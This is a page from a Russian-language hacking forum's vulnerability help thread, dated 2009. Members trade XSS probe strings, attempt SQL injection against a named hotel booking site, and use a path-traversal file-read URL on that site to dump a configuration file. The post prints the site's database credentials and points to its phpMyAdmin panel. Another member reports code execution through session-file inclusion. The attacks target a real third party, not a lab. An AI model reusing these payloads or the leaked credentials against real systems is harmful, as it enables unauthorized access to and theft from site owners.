ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1092 из 1393 « Первая < 9259299210421082 1088 1089 1090 1091 1092 1093 1094 1095 1096 110211421192 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #10911  
Старый 22.12.2009, 16:07
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию
Цитата:
Сообщение от гаррет-тень  
Всем привет. Я xss недавно начал изучать. Подскажите <script>alert()</script> я вбиваю вообще в любое поле на сайте? Так?
Универсальнее "><script>alert()</script> или '><script>alert()</script>
Что бы в случае чего,закрыть предидущий тег.В любом случае,лишним не будет,но может помочь.
Последний раз редактировалось m0Hze; 22.12.2009 в 16:10..
 
Ответить с цитированием

  #10912  
Старый 22.12.2009, 17:14
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию
http://hotel.1000turov.ru/hoteld2.php?id=1294367249+order+by+1--
начинаю применять union+select и результатов нет, в чем проблема?
 
Ответить с цитированием

  #10913  
Старый 22.12.2009, 17:22
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию
Цитата:
Сообщение от jecka3000  
http://hotel.1000turov.ru/hoteld2.php?id=1294367249+order+by+1--
начинаю применять union+select и результатов нет, в чем проблема?
Подзапросы?
 
Ответить с цитированием

  #10914  
Старый 22.12.2009, 17:25
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Код:
http://hotel.1000turov.ru/hoteld2.php?id=../../../../../../../../home/chobot/hotel.1000turov.ru/www/hoteld2.php
 
Ответить с цитированием

  #10915  
Старый 22.12.2009, 18:00
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706

Репутация: -1
По умолчанию
Спасибо всем за подробные ответы,но есть ещё одна идейка.Используя вышеприведённые методы,нужно знать,значения каких переменных записывается в сессию...а двиг самописный.
Возникла идея скопировать код загружаемого скрипта в директорию,доступную для записи.Подозрения на невыполнение кода именно в директории загруженных файлов.Поскольку скрипты выполняются,можно попробовать последовательность команд,но не уверен...


P.S.: Файлы сессий 100% инклудятся и хранятся в /tmp (вчера проверял).Буду искать переменные сессий,поскольку двиг мне неизвестен.
 
Ответить с цитированием

  #10916  
Старый 22.12.2009, 18:33
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию
m0Hze, а какие именно? Можешь привести примеры?)
Pashkela, спб, но если честно, я не понял что дает твой линк
 
Ответить с цитированием

  #10917  
Старый 22.12.2009, 18:50
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Цитата:
Сообщение от jecka3000  
m0Hze, а какие именно? Можешь привести примеры?)
Pashkela, спб, но если честно, я не понял что дает твой линк
гораздо круче обычной скули, обычная читалка, но последствия ужасные для админа могут быть:

Код:
http://hotel.1000turov.ru/hoteld2.php?id=../../../../../../../../home/chobot/1000turov.ru/www/inc/my.php

смотрим сорцы, а там:

<?php
	$connection = mysql_connect("localhost", "ayen", "chobot");
	mysql_select_db("chobot", $connection);
?>
ну и осталось только phpmyadmin найти, что тоже оказалось легко:

Код:
http://hotel.1000turov.ru/myadmin/
дел ровно на 1 минуту. Привелегии не проверял (но новую БД почему-то можно создавать, гы)
 
Ответить с цитированием

  #10918  
Старый 22.12.2009, 19:05
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706

Репутация: -1
По умолчанию
Как ни странно,мой способ сработал))).Теперь смогу попробовать ваши(исходники теперь будут).Выражаю огромною благодарность ).
 
Ответить с цитированием

  #10919  
Старый 22.12.2009, 19:52
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706

Репутация: -1
По умолчанию
мм,а если админка расположена за пределами docroot,то как к ней тогда вообще доступ получить ?
 
Ответить с цитированием

  #10920  
Старый 22.12.2009, 19:56
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
включить хек-догадку на 45%

Если у тебя есть инклуд - причем здесь админка? А вообще задавай вопросы конкретно, сам перечитай, что пишешь - с ума можно сойти, пока вгонишь, о чем вообще речь, предлагаешь всем мотать по три страницы назад? "Свой метод прокатил" - ты о чем вообще? Язык борется за независимость от мозгов?
 
Ответить с цитированием
Ответ
Страница 1092 из 1393 « Первая < 9259299210421082 1088 1089 1090 1091 1092 1093 1094 1095 1096 110211421192 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ